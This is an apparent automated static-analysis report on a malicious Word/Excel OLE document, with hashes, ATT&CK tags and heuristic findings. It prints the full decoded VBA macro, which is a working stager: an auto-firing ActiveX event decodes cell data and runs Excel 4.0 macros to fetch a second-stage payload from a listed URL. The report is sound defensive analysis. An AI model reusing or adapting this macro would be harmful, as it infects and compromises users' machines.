Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 cbebdf0be8281711…

MALICIOUS

Office (OLE) / .DOC

88.0 KB Created: 2020-10-21 10:14:22 First seen: 2026-05-16
MD5: 330fbf5bfa5f9e662d2e6e6a7c902c5c SHA-1: 2ea6e632a4963c0a644db7783ca37b22e9fa206f SHA-256: cbebdf0be8281711b6696a86aa108df31518715bad7113fddc4d4fc5e1355e6c
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The critical heuristic indicates that a VBA ActiveX event triggers a decoded Excel 4.0 macro. This macro then uses the `semistr` function to construct and execute a URL, likely to download and execute a second-stage payload. The constructed URL is 'https://kimandco.euzx7xgf!ryqbjlv5w074363918-==IF(SNUMBERCH"2C,GTWOKP)LD&* ?J?f'. The workbook is then closed without saving.

Heuristics 2

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER
    VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.
    Matched line in script
    If Len(aa) > 15 Then ExecuteExcel4Macro aa

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1551 bytes
SHA-256: 9f747318580737b87cdcf1f61c710088ff77b3b561d6520896f9eee1fbfc2e65
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "ImageCombo1, 1, 0, MSComctlLib, ImageCombo"

Function kles(hj, sd, er As String)
kles = Replace(hj, sd, er)
End Function

Function nipp(ByVal ye As String) As String
Dim Y As Long
Dim fd As String
Dim vf As String
For Y = 1 To Len(ye) Step 3
fd = Mid(ye, Y, 2): vf = vf & semistr(fd)
Next Y
nipp = vf
End Function
Private Sub ImageCombo1_Change()
welc
End Sub
Function semistr(aa As String) As String
If Len(aa) > 15 Then ExecuteExcel4Macro aa
semistr = Chr(Val("&h" & aa))
End Function
Sub welc()
s = 54: Randomize
Dim ft As String
For Each d In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
h = h + nipp(d)
Next
nmm = Split(h, "=")
tm = Split(nmm(0), "!")
peter = nmm(1): ft = tm(Int((s - 0 + 1) * Rnd + 0))
poupss = Split(peter, "!")
For Each di In poupss
mio = kles(di, "?", ft)
semistr (mio)
Next
mado
End Sub
Sub mado()
f = 0: ActiveWorkbook.Close f
End Sub